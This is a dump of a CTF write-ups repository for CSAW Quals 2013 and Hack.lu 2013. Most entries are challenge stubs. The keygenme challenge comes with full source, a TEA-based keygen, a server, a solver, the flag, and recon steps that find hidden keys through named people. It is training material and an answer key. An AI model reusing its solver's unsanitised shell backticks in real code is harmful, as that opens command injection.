-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/csaw2013reversing2-200/csaw2013reversing2.exe -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/dotnet-100/DotNetReversing.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/dotnet-100/DotNetReversing.exe -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/dotnet-100/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: DotNet 2 | 3 | **Category:** Reversing 4 | **Points:** 100 5 | **Solves:** 662 6 | **Description:** 7 | 8 | > [DotNetReversing.exe](DotNetReversing.exe) 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/impossible-500/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Impossible 2 | 3 | **Category:** Reversing 4 | **Points:** 500 5 | **Solves:** 82 6 | **Description:** 7 | 8 | > WTF, his hp is over 9000! Beat the game to get your key. 9 | > 10 | > [impossible.nds](impossible.nds) 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/impossible-500/impossible.nds: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/impossible-500/impossible.nds -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Keygenme 2 | 3 | **Category:** Reversing 4 | **Points:** 400 5 | **Solves:** 100 6 | **Description:** 7 | 8 | > nc 128.238.66.219 14549 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source.txt: -------------------------------------------------------------------------------- 1 | From: http://github.com/crowell/keygenme 2 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/README.md: -------------------------------------------------------------------------------- 1 | keygenme 2 | ======== 3 | 4 | keygenme challenge from csaw ctf 2013 5 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/cpu.h: -------------------------------------------------------------------------------- 1 | #ifndef __CPU__ 2 | #define __CPU__ 3 | #include 4 | #include "instruction.h" 5 | #define NUM_REG 32 6 | #define MEM_SIZE 8196 7 | class cpu 8 | { 9 | typedef unsigned int uint; 10 | typedef unsigned char uchar; 11 | public: 12 | cpu(); 13 | cpu(std::string Code, std::string UserKey, std::string FullString); 14 | ~cpu(); 15 | void Execute(); 16 | uint GetT6(); 17 | uint GetT7(); 18 | 19 | private: 20 | uint R[NUM_REG]; //32 21 | uint Hi; 22 | uint Lo; 23 | uchar Memory[MEM_SIZE]; 24 | uint Pc; 25 | instruction instr; 26 | std::string Code; 27 | std::string UserKey; 28 | uint hexval(char ch); 29 | uint hextoint(std::string hex); 30 | instruction interpretinstruction(); 31 | void FillMemory(std::string UserKey, std::string FullString); 32 | }; 33 | #endif 34 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/encrypt.asm: -------------------------------------------------------------------------------- 1 | add $t1, $zero, $zero# clear out $t1 ; 00004820 2 | addi $t1, $t1, 0x9e# TEA magic is 0x9e3779b7 ; 2129009E 3 | sll $t1, $t1, 8# shift out making room in the bottom 4; 00094a00 4 | addi $t1, $t1, 0x37 ; 21290037 5 | sll $t1, $t1, 8 ; 00094a00 6 | addi $t1, $t1, 0x79 ; 21290079 7 | sll $t1, $t1, 8 ; 00094a00 8 | addi $t1, $t1, 0xb9 # now $t1 holds the magic 0x9e3779b9 ; 212900b9 9 | add $t2, $zero, $zero# $t2 is the counter ; 00005020 10 | add $t0, $zero, $zero# $t0 is the sum ; 00004020 11 | lw $t8, $zero, 8# k0 mem[8-23] = k ; 8c180008 12 | lw $s7, $zero, 12# k1 ; 8C17000C 13 | lw $s6, $zero, 16# k2 ; 8C160010 14 | lw $t3, $zero, 20# k3 now our keys are in registers ; 8c0b0014 15 | lw $t7, $zero, 0# v0 mem[0-7] = v ; 8c0f0000 16 | lw $t6, $zero, 4# v1, our plaintext is in the registers ; 8c0e0004 17 | loop: add $t0, $t0, $t1# sum+=delta ; 01094020 18 | sll $s4, $t6, 4# (v1 << 4) ; 000ea100 19 | add $s4, $s4, $t8# +k0 part 1 is in s4 ; 0298a020 20 | add $s3, $t6, $t0# (v1 + sum) part 2 is in s3 ; 01c89820 21 | srl $s2, $t6, 5# (v1 >> 5) ; 000e9142 22 | add $s2, $s2, $s7# +k1, now do the xors part 3 in s2 ; 02579020 23 | xor $s1, $s2, $s3# xor 2 and 3 parts ; 02728826 24 | xor $s1, $s1, $s4# xor 1(2,3) ; 2348826 25 | add $t7, $t7, $s1# done with line 2 of the tea loop ; 01f17820 26 | sll $s4, $t7, 4# (v0 << 4) ; 000fa100 27 | add $s4, $s4, $s6# +k2 part 1 in s4 ; 0296a020 28 | add $s3, $t7, $t0# (v0 + sum) part 2 in s3 ; 01e89820 29 | srl $s2, $t7, 5# (v0 >> 5) ; 000f9142 30 | add $s2, $s2, $t3# +k3 part 2 in s2 ; 024b9020 31 | xor $s1, $s2, $s3# xor 2 and 3 parts ; 2728826 32 | xor $s1, $s1, $s4# xor 1(2,3) ; 2348826 33 | add $t6, $t6, $s1# done with line 2! ; 01d17020 34 | addi $s0, $zero, 32# for compare ; 20100020 35 | addi $t2, $t2, 1# the counter ; 214a0001 36 | bne $t2, $s0, 17# bne loop, now save back to the memory ; 15500010 37 | ; here t6 and t7 are the two values we need :-) 38 | 39 | 40 | 41 | 00004820 42 | 2129009E 43 | 00094a00 44 | 21290037 45 | 00094a00 46 | 21290079 47 | 00094a00 48 | 212900b9 49 | 00005020 50 | 00004020 51 | 8c180008 52 | 8C17000C 53 | 8C160010 54 | 8c0b0014 55 | 8c0f0000 56 | 8c0e0004 57 | 01094020 58 | 000ea100 59 | 0298a020 60 | 01c89820 61 | 000e9142 62 | 02579020 63 | 02728826 64 | 02348826 65 | 01f17820 66 | 000fa100 67 | 0296a020 68 | 01e89820 69 | 000f9142 70 | 024b9020 71 | 02728826 72 | 02348826 73 | 01d17020 74 | 20100020 75 | 214a0001 76 | 15500010 77 | 78 | 000048202129009E00094a002129003700094a002129007900094a00212900b900005020000040208c1800088C17000C8C1600108c0b00148c0f00008c0e000401094020000ea1000298a02001c89820000e914202579020027288260234882601f17820000fa1000296a02001e89820000f9142024b9020027288260234882601d1702020100020214a000115500010 79 | 80 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/instruction.cpp: -------------------------------------------------------------------------------- 1 | #include "instruction.h" 2 | 3 | instruction::instruction() 4 | { 5 | } 6 | 7 | instruction::instruction(uint opcode, uint rs, uint rt, uint rd, uint immediate, 8 | uint shift, uint funct, uint address) 9 | { 10 | this->opcode = opcode; 11 | this->rs = rs; 12 | this->rt = rt; 13 | this->rd = rd; 14 | this->immediate = immediate; 15 | this->shift = shift; 16 | this->funct = funct; 17 | this->address = address; 18 | } 19 | 20 | instruction::~instruction() 21 | { 22 | } 23 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/instruction.h: -------------------------------------------------------------------------------- 1 | #ifndef __INSTRUCTION__ 2 | #define __INSTRUCTION__ 3 | #include 4 | 5 | class instruction 6 | { 7 | typedef unsigned int uint; 8 | public: 9 | instruction(); 10 | instruction(uint opcode, uint rs, uint rt, uint rd, uint immediate, 11 | uint shift,uint funct, uint address); 12 | ~instruction(); 13 | uint opcode; 14 | uint rs; 15 | uint rt; 16 | uint rd; 17 | uint immediate; 18 | uint shift; 19 | uint funct; 20 | uint address; 21 | }; 22 | 23 | #endif -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/keygenme.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "cpu.h" 5 | using namespace std; 6 | typedef unsigned int uint; 7 | typedef unsigned char uchar; 8 | void printusage(char*); 9 | void printconstraints(char*); 10 | bool check(int, int, int, int); 11 | int main(int argc, char** argv) 12 | { 13 | if(argc < 4) 14 | { 15 | printusage(argv[0]); 16 | exit(1); 17 | } 18 | int namelen = strlen(argv[1]); 19 | if(namelen < 16) 20 | { 21 | printconstraints(argv[1]); 22 | exit(1); 23 | } 24 | int tok1 = strtoul(argv[2], NULL, 0); 25 | int tok2 = strtoul(argv[3], NULL, 0); 26 | std::string username(argv[1]); 27 | std::string fullkey = std::string(username.rbegin(), username.rend()); 28 | cpu* libdrm = new cpu("000048202129009E00094a002129003700094a002129007900094a00212900b900005020000040208c1800088C17000C8C1600108c0b00148c0f00008c0e000401094020000ea1000298a02001c89820000e914202579020027288260234882601f17820000fa1000296a02001e89820000f9142024b9020027288260234882601d1702020100020214a000115500010", username, fullkey); 29 | libdrm->Execute(); 30 | uint t6 = libdrm->GetT6(); 31 | uint t7 = libdrm->GetT7(); 32 | delete libdrm; 33 | if(check(t6, t7, tok1, tok2)) 34 | { 35 | std::cout << "*<:-)" << std::endl; 36 | } 37 | else 38 | { 39 | std::cout << ":-(" << std::endl; 40 | } 41 | return 0; 42 | } 43 | 44 | bool check(int t6, int t7, int tok1, int tok2) 45 | { 46 | uint temp1 = tok1 ^ 0x31333337; 47 | uchar ch1 = ((tok2 & 0xFF000000) >> 24); 48 | uchar ch2 = ((tok2 & 0x00FF0000) >> 16); 49 | uchar ch3 = ((tok2 & 0x0000FF00) >> 8); 50 | uchar ch4 = (tok2 & 0x000000FF); 51 | uint temp2 = ch2 << 24; 52 | temp2 |= (ch3 << 16); 53 | temp2 |= (ch1 << 8); 54 | temp2 |= (ch4); 55 | if(t6 == temp1 && t7 == temp2) 56 | { 57 | return true; 58 | } 59 | return false; 60 | } 61 | 62 | void printusage(char* progname) 63 | { 64 | std::cout << "usage: " << progname << " " << std::endl; 65 | } 66 | 67 | void printconstraints(char* username) 68 | { 69 | std::cout << "error: " << username << " is not a valid username" << std::endl; 70 | } 71 | 72 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/description.txt: -------------------------------------------------------------------------------- 1 | Reversing : keygenme 2 | 3 | someone has leaked a binary from an activation server. 4 | can you crack the keygen algorithm for me? 5 | 6 | using the ELF provided, reverse the keygeneration algorithm. 7 | The server listening at raxcity.com on port 2000 will ask you for 8 | the passwords of various usernames. If you can provide 10 passwords, you might get a nice flag :-) 9 | 10 | *hint* 11 | Rumor has it that the actual keygen runs in a custom vm. I'd start by decoding the instruction format. 12 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/keygen.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | /*********************************** 5 | * Keygenerator for CSAW Challenge * 6 | * Jeffrey Crowell * 7 | * used in solution and server * 8 | ***********************************/ 9 | 10 | 11 | typedef unsigned char uchar; 12 | typedef unsigned int uint; 13 | typedef struct keys keys; 14 | 15 | using namespace std; 16 | 17 | //simple pair of uints for returning from encrypt 18 | struct keys 19 | { 20 | uint v0; 21 | uint v1; 22 | }; 23 | 24 | //TEA off of the wikipedia page :-) 25 | keys encrypt (uint32_t* v, uint32_t* k) { 26 | uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */ 27 | uint32_t delta=0x9e3779b9; /* a key schedule constant */ 28 | uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */ 29 | for (i=0; i < 32; i++) { /* basic cycle start */ 30 | sum += delta; 31 | v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1); 32 | v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3); 33 | } /* end cycle */ 34 | keys s = {v0, v1}; 35 | return s; 36 | } 37 | 38 | 39 | int main(int argc, char** argv) 40 | { 41 | uint v[2]; 42 | uint k[4]; 43 | string input(argv[1]); 44 | if(input.length() < 16) //less than 16 chars makes the keys not work 45 | { 46 | cout << "input must be at least 16 characters" << endl; 47 | cout << "you provided only " << input.length() << " characters" << endl; 48 | return 0; 49 | } 50 | v[0] = (input[0] << 24) | (input[1] << 16) | (input[2] << 8) | (input[3]); //fill up the plaintext 51 | v[1] = (input[4] << 24) | (input[5] << 16) | (input[6] << 8) | (input[7]); 52 | string inrev(input.rbegin(), input.rend()); //reverse input 53 | k[0] = (inrev[0] << 24) | (inrev[1] << 16) | (inrev[2] << 8) | (inrev[3]); //fill up the keys 54 | k[1] = (inrev[4] << 24) | (inrev[5] << 16) | (inrev[6] << 8) | (inrev[7]); 55 | k[2] = (inrev[8] << 24) | (inrev[9] << 16) | (inrev[10] << 8) | (inrev[11]); 56 | k[3] = (inrev[12] << 24) | (inrev[13] << 16) | (inrev[14] << 8) | (inrev[15]); 57 | keys s = encrypt(v, k); //encrypt the input under the reverse input 58 | uint temp1 = s.v1 ^ 0x31333337; //this part is just to make it so that it isn't straight TEA as from the vm binary 59 | uchar ch1 = ((s.v0 & 0xFFFFFFFF) >> 24); 60 | uchar ch2 = ((s.v0 & 0x00FF0000) >> 16); 61 | uchar ch3 = ((s.v0 & 0x0000FF00) >> 8); 62 | uchar ch4 = ((s.v0 & 0x000000FF)); 63 | uint temp2 = (ch3 << 24) | (ch1 << 16) | (ch2 << 8) | (ch4); 64 | cout << temp1 << " " << temp2 << endl; //print out the keys, for use in the solver and the server 65 | } 66 | 67 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/server.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | require 'timeout' 3 | require 'securerandom' 4 | 5 | ''' 6 | keygenme server for CSAW CTF 2013 7 | Jeffrey Crowell 8 | 9 | Users must get 10 correct serials 10 | within 5 seconds each 11 | ''' 12 | 13 | 14 | server = TCPServer.open(2000) # Socket to listen on port 2000 15 | loop { # Servers run forever 16 | Thread.start(server.accept) do |client| 17 | sock_domain, remote_port, remote_hostname, remote_ip = client.peeraddr 18 | puts "connection from #{remote_hostname} #{remote_ip} #{remote_port}" 19 | client.puts "welcome to the activation server\r\n" 20 | (0..9).each{|i| 21 | user = SecureRandom.urlsafe_base64(16) 22 | keys = `./keygen #{user}`.strip 23 | client.puts("give me the password for #{user}") 24 | begin 25 | Timeout::timeout(5) do 26 | pass = client.gets.chomp.strip 27 | if pass == keys 28 | client.puts(":-)") 29 | else 30 | client.puts("wrong password :'-(") 31 | client.close 32 | end 33 | end 34 | rescue Timeout::Error 35 | client.puts("too slow :'-(") 36 | client.close 37 | end 38 | } 39 | client.puts "here's the flag key{vM_k3yg3n_a1n7_n0_th4ng}" 40 | puts "solve from #{remote_hostname} #{remote_ip} #{remote_port}" 41 | client.close # Disconnect from the client 42 | end 43 | } 44 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/solver.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | 3 | """ 4 | keygenme solver for CSAW CTF 2013 5 | Jeffrey Crowell 6 | top sekret solution 7 | 8 | """ 9 | 10 | host = '128.238.66.219' 11 | port = '14549' 12 | socket = TCPSocket.open(host, port) 13 | s = socket.gets.strip 14 | puts "SERVER: #{s}" 15 | (0..9).each{|i| 16 | s = socket.gets.strip 17 | puts "SERVER: #{s}" 18 | m = s.split(" ") 19 | u = m[-1] 20 | k = `./keygen #{u}`.strip 21 | puts "KEYGEN: #{k}" 22 | socket.puts(k) 23 | s = socket.gets.strip 24 | puts "SERVER: #{s}" 25 | } 26 | 27 | s = socket.gets.strip 28 | puts "FLAG: #{s}" 29 | 30 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/solvertest.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | 3 | """ 4 | keygenme solver for CSAW CTF 2013 5 | Jeffrey Crowell 6 | top sekret solution 7 | 8 | """ 9 | 10 | host = '128.238.66.219' 11 | port = '111111' 12 | socket = TCPSocket.open(host, port) 13 | s = socket.gets.strip 14 | puts "SERVER: #{s}" 15 | (0..9).each{|i| 16 | s = socket.gets.strip 17 | puts "SERVER: #{s}" 18 | m = s.split(" ") 19 | u = m[-1] 20 | k = `./keygen #{u}`.strip 21 | puts "KEYGEN: #{k}" 22 | socket.puts(k) 23 | s = socket.gets.strip 24 | puts "SERVER: #{s}" 25 | } 26 | 27 | s = socket.gets.strip 28 | puts "FLAG: #{s}" 29 | 30 | -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/keygenme-400/keygenme32.elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/keygenme-400/keygenme32.elf -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/noobs-first-firmware-mod-500/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Noobs First Firmware Mod 2 | 3 | **Category:** Reversing 4 | **Points:** 500 5 | **Solves:** 40 6 | **Description:** 7 | 8 | > N00b firmware modder says: "My first u-boot mod, there might be errors :(" 9 | > 10 | > [noobs-first-firmware-mod.tgz](noobs-first-firmware-mod.tgz) 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/noobs-first-firmware-mod-500/noobs-first-firmware-mod.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/noobs-first-firmware-mod.tgz -------------------------------------------------------------------------------- /csaw-quals-2013/solves.txt: -------------------------------------------------------------------------------- 1 | network1-50 1004 2 | guess-harder-100 985 3 | network2-50 864 4 | black-and-white-100 818 5 | exploit1-100 701 6 | dotnet-100 662 7 | csaw2013reversing1-100 644 8 | csaw2013reversing2-200 357 9 | bikinibonanza-150 316 10 | nevernote-200 307 11 | deeeeeeaaaaaadbeeeeeeeeeef-200 224 12 | life-300 212 13 | exploit2-200 198 14 | crackme-300 174 15 | csawpad-100 141 16 | onlythisprogram-300 127 17 | csawdiary-300 116 18 | keygenme-400 100 19 | widgetcorp-400 99 20 | herpderper-300 89 21 | miteegashun-400 85 22 | impossible-500 82 23 | cryptomatv2-400 45 24 | noobs-first-firmware-mod-500 40 25 | slurp-500 27 26 | scp-hack-500 7 27 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/cryptomatv2-400/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: CryptoMatv2 2 | 3 | **Category:** Web 4 | **Points:** 400 5 | **Solves:** 45 6 | **Description:** 7 | 8 | > Cryptomat is back! You know the drill. Get the key from Dog. 9 | > 10 | > http://128.238.66.225 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/web/guess-harder-100/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Guess Harder 2 | 3 | **Category:** Web 4 | **Points:** 100 5 | **Solves:** 985 6 | **Description:** 7 | 8 | > http://128.238.66.215 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/web/herpderper-300/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Herpderper 2 | 3 | **Category:** Web 4 | **Points:** 300 5 | **Solves:** 89 6 | **Description:** 7 | 8 | > [herpderper.apk](herpderper.apk) 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/web/herpderper-300/herpderper.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/web/herpderper-300/herpderper.apk -------------------------------------------------------------------------------- /csaw-quals-2013/web/nevernote-200/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Nevernote 2 | 3 | **Category:** Web 4 | **Points:** 200 5 | **Solves:** 307 6 | **Description:** 7 | 8 | > http://128.238.66.214 9 | > from: Nevernote Admin 10 | > to: challenger@ctf.isis.poly.edu 11 | > date: Thurs, Sep 19, 2013 at 3:05 PM 12 | > subject: Help 13 | > 14 | > Friend, 15 | > Evil hackers have taken control of the Nevernote server and locked me out. While I'm working on restoring access, is there anyway you can get in to my account and save a copy of my notes? I know the system is super secure but if anybody can do it - its you. 16 | > Thanks, 17 | > Nevernote Admin 18 | 19 | ## Write-up 20 | 21 | (TODO) 22 | 23 | ## Other write-ups and resources 24 | 25 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/web/recon/alex-taylor.txt: -------------------------------------------------------------------------------- 1 | Alexander Taylor - 100 Points 2 | Solved by 134 teams. 3 | 4 | Alexander Taylor 5 | https://www.google.com/search?&q=Alexander+Taylor 6 | 7 | 1) Grab photo from judges page 8 | 2) Strings/analyze 9 | 3) Notice unusual chunks 10 | 4) extract bogus ones 11 | 5) xor 12 | 6) ??? 13 | 7) profit 14 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/recon/brandon-edwards.txt: -------------------------------------------------------------------------------- 1 | Brandon Edwards - 100 Points 2 | Solved by 425 teams. 3 | 4 | Brandon Edwards 5 | https://www.google.com/search?&q=Brandon+Edwards 6 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/recon/historypeats.txt: -------------------------------------------------------------------------------- 1 | historypeats - 100 Points 2 | Solved by 607 teams. 3 | 4 | historypeats 5 | https://www.google.com/search?&q=historypeats 6 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/recon/jordan-wiens.txt: -------------------------------------------------------------------------------- 1 | Jordan Wiens - 100 Points 2 | Solved by 188 teams. 3 | 4 | http://key.psifertex.com 5 | 6 | 7 | 1) key.psfiertex.com contains: "Michael Vario sure does some suspicious signs, hope he doesn't do me" 8 | 2) Google "Michael Vario", see multiple results about weird PGP key signing he does. 9 | 3) Search jordan wiens on any public keyserver: http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x9FBEBC5EA827D636 10 | 4) 'getting warmer!' in gpg key name 11 | 12 | 5a) search for analyze pgp and follow http://www.macfreek.nl/memory/Analysing_PGP_Identities 13 | 14 | or 15 | 16 | 5b) just import key into thunderbird. notice picture. 17 | 18 | or 19 | 20 | 5c) search/import with gpg, use gpg 'showpicture' function to show image 21 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/recon/julian-cohen.txt: -------------------------------------------------------------------------------- 1 | Julian Cohen - 100 Points 2 | Solved by 258 teams. 3 | 4 | Julian Cohen 5 | https://www.google.com/search?&q=Julian+Cohen 6 | 7 | 8 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/recon/kevin-chung.txt: -------------------------------------------------------------------------------- 1 | Kevin Chung - 100 Points 2 | Solved by 292 teams. 3 | 4 | Kevin Chung 5 | https://www.google.com/search?&q=Kevin+Chung 6 | 7 | 1) add 'security' or 'poly' to kevin's search: 8 | 2) find codekevin.com 9 | 3) shows hint that no key there, but references 'graduation' 10 | 4) https://www.google.com/search?&q=Kevin+Chung+high+school 11 | 5) Page 3 finds: https://hsf.isis.poly.edu/previous_winners 12 | 6) Which points to: https://hsf.isis.poly.edu/assets/uploads/pages/previous_winners/key.txt 13 | 14 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/recon/odin.txt: -------------------------------------------------------------------------------- 1 | Odin - 100 Points 2 | Solved by 165 teams. 3 | 4 | Odin 5 | https://www.google.com/search?&q=Odin 6 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/recon/theodore-reed.txt: -------------------------------------------------------------------------------- 1 | Theodore Reed - 100 Points 2 | Solved by 115 teams. 3 | 4 | http://prosauce.org 5 | -------------------------------------------------------------------------------- /csaw-quals-2013/web/widgetcorp-400/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: WidgetCorp 2 | 3 | **Category:** Web 4 | **Points:** 400 5 | **Solves:** 99 6 | **Description:** 7 | 8 | > http://128.238.66.224 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /hack-lu-ctf-2013/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013 write-ups 2 | 3 | * 4 | * [Scoreboard](https://ctf.fluxfingers.net/2013/scoreboard) 5 | 6 | ## Completed write-ups 7 | 8 | * none yet 9 | 10 | ## External write-ups only 11 | 12 | * [Beer Pump Filtration](misc/Beer-Pump-Filtration) 13 | * [BREW'r'Y](crypto/BREW-r-Y) 14 | * [ECKA](crypto/ECKA) 15 | * [ELF](reversing/ELF) 16 | * [FluxArchiv (Part 1)](reversing/FluxArchiv-Part1) 17 | * [FluxArchiv (Part 2)](reversing/FluxArchiv-Part2) 18 | * [Geier's Lambda](crypto/Geier-s-Lambda) 19 | * [Geolocation Flag](misc/Geolocation-Flag) 20 | * [Marvin is plain-Jane](crypto/Marvin-is-plain-Jane) 21 | * [Packed](internals/Packed) 22 | * [Pay TV](web/Pay-TV) 23 | * [RoboAuth](reversing/RoboAuth) 24 | * [Roboparty](misc/Roboparty) 25 | * [Robot Plans](internals/Robot-Plans) 26 | * [Robotic Superiority](exploiting/Robotic-Superiority) 27 | * [Robots Exclusion Committee](web/Robots-Exclusion-Committee) 28 | * [Wannabe](exploiting/Wannabe) 29 | * [What's wrong with this?](internals/What-s-wrong-with-this) 30 | 31 | ## Missing write-ups 32 | 33 | * [Breznparadisebugmaschine](exploiting/Breznparadisebugmaschine) 34 | * [For whom the bell tolls](misc/For-whom-the-bell-tolls) 35 | * [OTP](misc/OTP) 36 | -------------------------------------------------------------------------------- /hack-lu-ctf-2013/crypto/BREW-r-Y/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: BREW'r'Y 2 | 3 | **Category:** Crypto 4 | **Points:** 350 5 | **Author:** dwuid 6 | **Description:** 7 | 8 | > Finally, the robots managed to sneak into one of our breweries. I guess I won't have to explain how bad that really is. That darn non-physical ones even shutdown our login system. Shiny thing, advanced technology, all based on fingerprints. Been secure as hell. If only it was running. Well, basically, we're screwed. 9 | > But wait, there's hope. Seems like they didn't shutdown our old login system. Backward compatibility's a bitch, eh? Unfortunately, we got like _zero_ knowledge about the protocol. I mean come on, the last time we used that thingy was like decades ago. If we are lucky, the old authentication method is buggy. 10 | > So, I heard you're kinda smart? Have a look at it. We desperately need to get drunk^W supply. You'll find the old system at ctf.fluxfingers.net:1335. Good luck. 11 | > 12 | > Hint: Data is - and is expected to be - compressed using zlib. 13 | > Hint: The challenge text gives hints about the protocol involved. We updated it in order to reflect that fact. 14 | 15 | ## Write-up 16 | 17 | None 18 | 19 | ## Other write-ups and resources 20 | 21 | [More Smoked Leet Chicken](http://mslc.ctf.su/wp/hack-lu-2013-ctf-crypto-350-brewry) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/crypto/ECKA/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: ECKA 2 | 3 | **Category:** Crypto 4 | **Points:** 100 5 | **Author:** asante 6 | **Description:** 7 | 8 | > Hey you! 9 | > Come over and help me, please. We discovered a strange key agreement protocol used on this server: ctf.fluxfingers.net:1330. 10 | > They send a curve which they use later. But we think the robots are a bit UBER-cautious and do not use the curve's P. So they first exchange their public point with a technique we could not figure out. It looks like they do not need a public key for this step. 11 | > Afterwards they use another technique to agree on a key which they ultimately use to send some encrypted password. 12 | > 13 | > We need this last password to shut down the robo-factory on our way to the Oktoberfest. 14 | > 15 | > Oh btw, the robots use AES-ECB for symmetric encryption. 16 | > 17 | > Hint: He, we have the latest news for you. The first part of their strange key agreement was designed by the famous SHA-Robot Мир! 18 | > For all robo hunters out there: Your quest-description was updated - check it! 19 | 20 | ## Write-up 21 | 22 | None 23 | 24 | ## Other write-ups and resources 25 | 26 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-ecka](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-ecka) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/crypto/Geier-s-Lambda/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Geier's Lambda 2 | 3 | **Category:** Crypto 4 | **Points:** 200 5 | **Author:** asante 6 | **Description:** 7 | 8 | > Hey! 9 | > We need your help. Our agent found some details about a huge conspiracy. Looks like they wanna plant a bomb near the Oktoberfest's main fairground ride. But we have a good chance, to get the defusing-password. That's where you have to jump in. We managed to steal the encrypted password along with a decryption file. Our agent also started to work on it, but one of the robots caught him and now we are left-behind with his infos. 10 | > 11 | > He found a collision on the real password but wasn't sure, if he can use that one. But, here is it: “Le1sRI6I” - perhaps you have better luck. He also found out, that the robots only use alphanumeric characters and that the collision is of the same length, than the real password. The last thing he told us is, that the defusing password must contain only printable characters. 12 | > 13 | > Hope that helps you! And now hurry! 14 | > 15 | > Here is your challenge: [pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs](pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs) 16 | 17 | ## Write-up 18 | 19 | None 20 | 21 | ## Other write-ups and resources 22 | 23 | * 